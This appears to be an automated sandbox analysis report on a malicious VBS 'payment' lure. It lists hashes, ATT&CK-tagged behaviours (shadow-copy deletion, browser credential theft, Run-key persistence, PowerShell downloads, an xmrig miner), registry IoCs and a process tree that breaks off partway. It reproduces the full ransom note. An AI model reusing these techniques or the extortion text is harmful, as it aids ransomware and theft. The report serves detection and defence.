eb860d8529dd9d5a2277b1c340d8aa2db7eecdb172d57133038b8f90ce39bb31

Analysis

max time kernel
149s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20250314-en
resource tags

arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system
submitted
30/03/2025, 18:32

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Payment_Activity_0037_2025-3-30.vbs
Size

13KB
MD5

1666b10f8f85c81a689e60018dd65abf
SHA1

40320e7700630bc0e35a11cc803cfa3ad46aa79b
SHA256

eb860d8529dd9d5a2277b1c340d8aa2db7eecdb172d57133038b8f90ce39bb31
SHA512

0cae1de09fc3d46a02541a6f34c931e4748f06fbf0add8fa89caccf5a9cbd68d15871453e70320b8d4fc23b75191b984ff47f87ba8dcdada5765628356fb20bc
SSDEEP

192:NB0v8qa258i+h6xp2YXBoN8x6kgqDMOhWm3Gmim3jzVcGZlIyB1AQaAMKz3N2v:3qyi0mdxoY6HyLjpLZlIyUQanKzN2v

Score

10^/10

credential_access defense_evasion discovery execution impact persistence ransomware spyware stealer

Malware Config

Extracted

Path

C:\Users\Admin\AppData\Local\Temp\Decrypt_files.txt

Ransom Note

ATTENTION! You can return your files! All your files are encrypted with a strong encryption algorithm and unique key. The only method of recovering files is to purchase a decrypt tool and key. Do not try to recover your files without a decrypt tool or try to turn off your pc, this may damage your files making them making them impossible to recover. We advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned. We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision. Check your email 'Spam' or 'Junk' folder if you don't get answer within 6 hours. Contact us email: [email protected] [email protected] ID :937CC8CA764AA78A070CDC80208FC56AD226E76957AD724BE0BB6FF4FD9C0427

Emails

[email protected]

Signatures

Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware defense_evasion impact execution

File Deletion
T1070.004

Inhibit System Recovery
T1490

Windows Management Instrumentation
T1047

Blocklisted process makes network request 8 IoCs

flow	pid	Process
31	2472	powershell.exe
186	3748	rundll32.exe
187	3748	rundll32.exe
188	3748	rundll32.exe
190	1824	powershell.exe
191	1824	powershell.exe
194	5400	powershell.exe
196	3748	rundll32.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs

Powershell Invoke Web Request.

execution

PowerShell

T1059.001

pid	Process
2472	powershell.exe
1824	powershell.exe
5400	powershell.exe
4272	powershell.exe
8	powershell.exe
3568	powershell.exe
5424	powershell.exe

Downloads MZ/PE file 3 IoCs

flow	pid	Process
31	2472	powershell.exe
191	1824	powershell.exe
194	5400	powershell.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3218366390-1258052702-4267193707-1000\Control Panel\International\Geo\Nation	WScript.exe

Credentials from Password Stores: Windows Credential Manager 1 TTPs
Suspicious access to Credentials History.
credential_access stealer

Windows Credential Manager
T1555.004

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Decrypt_files.txt	rundll32.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\Decrypt_files.txt	rundll32.exe

Executes dropped EXE 2 IoCs

pid	Process
5896	dismhost.exe
7100	xmrig.exe

Loads dropped DLL 9 IoCs

pid	Process
5764	rundll32.exe
5736	rundll32.exe
1888	rundll32.exe
3748	rundll32.exe
5896	dismhost.exe
5896	dismhost.exe
5896	dismhost.exe
5896	dismhost.exe
5896	dismhost.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3218366390-1258052702-4267193707-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SysWOWDNS = "\"C:\\Windows\\SysWOW64\\rundll32.exe\" shell32.dll,Control_RunDLL C:\\ProgramData\\DNSBackup\\DNSBackup.cpl"	rundll32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3218366390-1258052702-4267193707-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\DNSBackup = "\"C:\\Windows\\System32\\rundll32.exe\" shell32.dll,Control_RunDLL C:\\ProgramData\\DNSBackup\\DNSBackup.cpl"	rundll32.exe

Drops desktop.ini file(s) 4 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini	rundll32.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\Desktop.ini	rundll32.exe
File opened for modification	C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini	rundll32.exe
File opened for modification	C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\Desktop.ini	rundll32.exe

Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
defense_evasion

File Deletion
T1070.004

Legitimate hosting services abused for malware hosting/C2 1 TTPs 5 IoCs

Web Service

T1102

flow	ioc
30	raw.githubusercontent.com
31	raw.githubusercontent.com
185	raw.githubusercontent.com
189	raw.githubusercontent.com
191	raw.githubusercontent.com

Drops file in Windows directory 2 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Logs\DISM\dism.log	powershell.exe
File opened for modification	C:\Windows\Logs\DISM\dism.log	dismhost.exe

Hide Artifacts: Ignore Process Interrupts 1 TTPs 1 IoCs

Command interpreters often include specific commands/flags that ignore errors and other hangups.

defense_evasion

Ignore Process Interrupts

T1564.011

pid	Process
6108	powershell.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 48 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rundll32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rundll32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rundll32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rundll32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	msedge.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133878331449130263"	msedge.exe

Modifies registry class 2 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	msedge.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-3218366390-1258052702-4267193707-1000\{2E5D3EEB-A984-42E7-8B45-5CA83F64D045}	msedge.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
3568	powershell.exe
3568	powershell.exe
2472	powershell.exe
2472	powershell.exe
5736	rundll32.exe
5736	rundll32.exe
5736	rundll32.exe
5736	rundll32.exe
5764	rundll32.exe
5764	rundll32.exe
5764	rundll32.exe
5764	rundll32.exe
1888	rundll32.exe
1888	rundll32.exe
1888	rundll32.exe
1888	rundll32.exe
3748	rundll32.exe
3748	rundll32.exe
3748	rundll32.exe
3748	rundll32.exe
5736	rundll32.exe
5736	rundll32.exe
5736	rundll32.exe
5736	rundll32.exe
5764	rundll32.exe
5764	rundll32.exe
5764	rundll32.exe
5764	rundll32.exe
1888	rundll32.exe
1888	rundll32.exe
1888	rundll32.exe
1888	rundll32.exe
3748	rundll32.exe
3748	rundll32.exe
3748	rundll32.exe
3748	rundll32.exe
5736	rundll32.exe
5736	rundll32.exe
5736	rundll32.exe
5736	rundll32.exe
5764	rundll32.exe
5764	rundll32.exe
5764	rundll32.exe
5764	rundll32.exe
1888	rundll32.exe
1888	rundll32.exe
1888	rundll32.exe
1888	rundll32.exe
3748	rundll32.exe
3748	rundll32.exe
3748	rundll32.exe
3748	rundll32.exe
5736	rundll32.exe
5736	rundll32.exe
5736	rundll32.exe
5736	rundll32.exe
5764	rundll32.exe
5764	rundll32.exe
5764	rundll32.exe
5764	rundll32.exe
1888	rundll32.exe
1888	rundll32.exe
1888	rundll32.exe
1888	rundll32.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 11 IoCs

pid	Process
2384	msedge.exe
2384	msedge.exe
2384	msedge.exe
2384	msedge.exe
2384	msedge.exe
2384	msedge.exe
2384	msedge.exe
2384	msedge.exe
2384	msedge.exe
2384	msedge.exe
2384	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	3568	powershell.exe
Token: SeDebugPrivilege	2472	powershell.exe
Token: SeDebugPrivilege	3748	rundll32.exe
Token: SeDebugPrivilege	3748	rundll32.exe
Token: SeDebugPrivilege	3748	rundll32.exe
Token: SeDebugPrivilege	3748	rundll32.exe
Token: SeDebugPrivilege	3748	rundll32.exe
Token: SeDebugPrivilege	1824	powershell.exe
Token: SeDebugPrivilege	3748	rundll32.exe
Token: SeDebugPrivilege	3748	rundll32.exe
Token: SeDebugPrivilege	5424	powershell.exe
Token: SeDebugPrivilege	6108	powershell.exe
Token: SeDebugPrivilege	5400	powershell.exe
Token: SeDebugPrivilege	4272	powershell.exe
Token: SeIncreaseQuotaPrivilege	6432	wmic.exe
Token: SeSecurityPrivilege	6432	wmic.exe
Token: SeTakeOwnershipPrivilege	6432	wmic.exe
Token: SeLoadDriverPrivilege	6432	wmic.exe
Token: SeSystemProfilePrivilege	6432	wmic.exe
Token: SeSystemtimePrivilege	6432	wmic.exe
Token: SeProfSingleProcessPrivilege	6432	wmic.exe
Token: SeIncBasePriorityPrivilege	6432	wmic.exe
Token: SeCreatePagefilePrivilege	6432	wmic.exe
Token: SeBackupPrivilege	6432	wmic.exe
Token: SeRestorePrivilege	6432	wmic.exe
Token: SeShutdownPrivilege	6432	wmic.exe
Token: SeDebugPrivilege	6432	wmic.exe
Token: SeSystemEnvironmentPrivilege	6432	wmic.exe
Token: SeRemoteShutdownPrivilege	6432	wmic.exe
Token: SeUndockPrivilege	6432	wmic.exe
Token: SeManageVolumePrivilege	6432	wmic.exe
Token: 33	6432	wmic.exe
Token: 34	6432	wmic.exe
Token: 35	6432	wmic.exe
Token: 36	6432	wmic.exe
Token: SeIncreaseQuotaPrivilege	6432	wmic.exe
Token: SeSecurityPrivilege	6432	wmic.exe
Token: SeTakeOwnershipPrivilege	6432	wmic.exe
Token: SeLoadDriverPrivilege	6432	wmic.exe
Token: SeSystemProfilePrivilege	6432	wmic.exe
Token: SeSystemtimePrivilege	6432	wmic.exe
Token: SeProfSingleProcessPrivilege	6432	wmic.exe
Token: SeIncBasePriorityPrivilege	6432	wmic.exe
Token: SeCreatePagefilePrivilege	6432	wmic.exe
Token: SeBackupPrivilege	6432	wmic.exe
Token: SeRestorePrivilege	6432	wmic.exe
Token: SeShutdownPrivilege	6432	wmic.exe
Token: SeDebugPrivilege	6432	wmic.exe
Token: SeSystemEnvironmentPrivilege	6432	wmic.exe
Token: SeRemoteShutdownPrivilege	6432	wmic.exe
Token: SeUndockPrivilege	6432	wmic.exe
Token: SeManageVolumePrivilege	6432	wmic.exe
Token: 33	6432	wmic.exe
Token: 34	6432	wmic.exe
Token: 35	6432	wmic.exe
Token: 36	6432	wmic.exe
Token: SeBackupPrivilege	6584	vssvc.exe
Token: SeRestorePrivilege	6584	vssvc.exe
Token: SeAuditPrivilege	6584	vssvc.exe
Token: SeIncreaseQuotaPrivilege	824	wmic.exe
Token: SeSecurityPrivilege	824	wmic.exe
Token: SeTakeOwnershipPrivilege	824	wmic.exe
Token: SeLoadDriverPrivilege	824	wmic.exe
Token: SeSystemProfilePrivilege	824	wmic.exe

Suspicious use of FindShellTrayWindow 3 IoCs

pid	Process
2384	msedge.exe
2384	msedge.exe
7100	xmrig.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1192 wrote to memory of 1576	1192	WScript.exe	86
PID 1192 wrote to memory of 1576	1192	WScript.exe	86
PID 1576 wrote to memory of 3568	1576	cmd.exe	88
PID 1576 wrote to memory of 3568	1576	cmd.exe	88
PID 3568 wrote to memory of 2384	3568	powershell.exe	89
PID 3568 wrote to memory of 2384	3568	powershell.exe	89
PID 2384 wrote to memory of 732	2384	msedge.exe	90
PID 2384 wrote to memory of 732	2384	msedge.exe	90
PID 1192 wrote to memory of 1008	1192	WScript.exe	91
PID 1192 wrote to memory of 1008	1192	WScript.exe	91
PID 1008 wrote to memory of 2472	1008	cmd.exe	140
PID 1008 wrote to memory of 2472	1008	cmd.exe	140
PID 2384 wrote to memory of 1152	2384	msedge.exe	94
PID 2384 wrote to memory of 1152	2384	msedge.exe	94
PID 2384 wrote to memory of 2084	2384	msedge.exe	95
PID 2384 wrote to memory of 2084	2384	msedge.exe	95
PID 2384 wrote to memory of 2084	2384	msedge.exe	95
PID 2384 wrote to memory of 2084	2384	msedge.exe	95
PID 2384 wrote to memory of 2084	2384	msedge.exe	95
PID 2384 wrote to memory of 2084	2384	msedge.exe	95
PID 2384 wrote to memory of 2084	2384	msedge.exe	95
PID 2384 wrote to memory of 2084	2384	msedge.exe	95
PID 2384 wrote to memory of 2084	2384	msedge.exe	95
PID 2384 wrote to memory of 2084	2384	msedge.exe	95
PID 2384 wrote to memory of 2084	2384	msedge.exe	95
PID 2384 wrote to memory of 2084	2384	msedge.exe	95
PID 2384 wrote to memory of 2084	2384	msedge.exe	95
PID 2384 wrote to memory of 2084	2384	msedge.exe	95
PID 2384 wrote to memory of 2084	2384	msedge.exe	95
PID 2384 wrote to memory of 2084	2384	msedge.exe	95
PID 2384 wrote to memory of 2084	2384	msedge.exe	95
PID 2384 wrote to memory of 2084	2384	msedge.exe	95
PID 2384 wrote to memory of 2084	2384	msedge.exe	95
PID 2384 wrote to memory of 2084	2384	msedge.exe	95
PID 2384 wrote to memory of 2084	2384	msedge.exe	95
PID 2384 wrote to memory of 2084	2384	msedge.exe	95
PID 2384 wrote to memory of 2084	2384	msedge.exe	95
PID 2384 wrote to memory of 2084	2384	msedge.exe	95
PID 2384 wrote to memory of 2084	2384	msedge.exe	95
PID 2384 wrote to memory of 2084	2384	msedge.exe	95
PID 2384 wrote to memory of 2084	2384	msedge.exe	95
PID 2384 wrote to memory of 2084	2384	msedge.exe	95
PID 2384 wrote to memory of 2084	2384	msedge.exe	95
PID 2384 wrote to memory of 2084	2384	msedge.exe	95
PID 2384 wrote to memory of 2084	2384	msedge.exe	95
PID 2384 wrote to memory of 2084	2384	msedge.exe	95
PID 2384 wrote to memory of 2084	2384	msedge.exe	95
PID 2384 wrote to memory of 2084	2384	msedge.exe	95
PID 2384 wrote to memory of 2084	2384	msedge.exe	95
PID 2384 wrote to memory of 2084	2384	msedge.exe	95
PID 2384 wrote to memory of 2084	2384	msedge.exe	95
PID 2384 wrote to memory of 2084	2384	msedge.exe	95
PID 2384 wrote to memory of 2084	2384	msedge.exe	95
PID 2384 wrote to memory of 2084	2384	msedge.exe	95
PID 2384 wrote to memory of 2084	2384	msedge.exe	95
PID 2384 wrote to memory of 2084	2384	msedge.exe	95
PID 2384 wrote to memory of 2084	2384	msedge.exe	95
PID 2384 wrote to memory of 2084	2384	msedge.exe	95
PID 2384 wrote to memory of 2084	2384	msedge.exe	95
PID 2384 wrote to memory of 2084	2384	msedge.exe	95
PID 2384 wrote to memory of 2084	2384	msedge.exe	95
PID 2384 wrote to memory of 2084	2384	msedge.exe	95
PID 2384 wrote to memory of 2084	2384	msedge.exe	95
PID 2384 wrote to memory of 2084	2384	msedge.exe	95

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Payment_Activity_0037_2025-3-30.vbs"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1192
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c powershell start-process msedge https://www.scribd.com/document/806838445/Bank-Statement
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1576
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell start-process msedge https://www.scribd.com/document/806838445/Bank-Statement
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:3568
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" https://www.scribd.com/document/806838445/Bank-Statement
      4⤵
      Checks processor information in registry
      Enumerates system info in registry
      Modifies data under HKEY_USERS
      Modifies registry class
      Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
      Suspicious use of FindShellTrayWindow
      Suspicious use of WriteProcessMemory
      PID:2384
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x2c8,0x2cc,0x2d0,0x2c4,0x360,0x7ffc89a2f208,0x7ffc89a2f214,0x7ffc89a2f220
        5⤵
        
        PID:732
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1804,i,8843362237762708885,13578408215132624561,262144 --variations-seed-version --mojo-platform-channel-handle=2184 /prefetch:3
        5⤵
        
        PID:1152
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2156,i,8843362237762708885,13578408215132624561,262144 --variations-seed-version --mojo-platform-channel-handle=2152 /prefetch:2
        5⤵
        
        PID:2084
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2520,i,8843362237762708885,13578408215132624561,262144 --variations-seed-version --mojo-platform-channel-handle=2532 /prefetch:8
        5⤵
        
        PID:4332
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3528,i,8843362237762708885,13578408215132624561,262144 --variations-seed-version --mojo-platform-channel-handle=3576 /prefetch:1
        5⤵
        
        PID:1100
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3548,i,8843362237762708885,13578408215132624561,262144 --variations-seed-version --mojo-platform-channel-handle=3828 /prefetch:1
        5⤵
        
        PID:3048
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --always-read-main-dll --field-trial-handle=4168,i,8843362237762708885,13578408215132624561,262144 --variations-seed-version --mojo-platform-channel-handle=4324 /prefetch:1
        5⤵
        
        PID:4624
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --extension-process --renderer-sub-type=extension --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --always-read-main-dll --field-trial-handle=4268,i,8843362237762708885,13578408215132624561,262144 --variations-seed-version --mojo-platform-channel-handle=4340 /prefetch:2
        5⤵
        
        PID:2452
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4300,i,8843362237762708885,13578408215132624561,262144 --variations-seed-version --mojo-platform-channel-handle=3952 /prefetch:8
        5⤵
        
        PID:2884
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5312,i,8843362237762708885,13578408215132624561,262144 --variations-seed-version --mojo-platform-channel-handle=5300 /prefetch:8
        5⤵
        
        PID:3596
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5340,i,8843362237762708885,13578408215132624561,262144 --variations-seed-version --mojo-platform-channel-handle=5316 /prefetch:8
        5⤵
        
        PID:2760
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5432,i,8843362237762708885,13578408215132624561,262144 --variations-seed-version --mojo-platform-channel-handle=5108 /prefetch:8
        5⤵
        
        PID:2204
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --always-read-main-dll --field-trial-handle=3936,i,8843362237762708885,13578408215132624561,262144 --variations-seed-version --mojo-platform-channel-handle=5212 /prefetch:1
        5⤵
        
        PID:3536
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
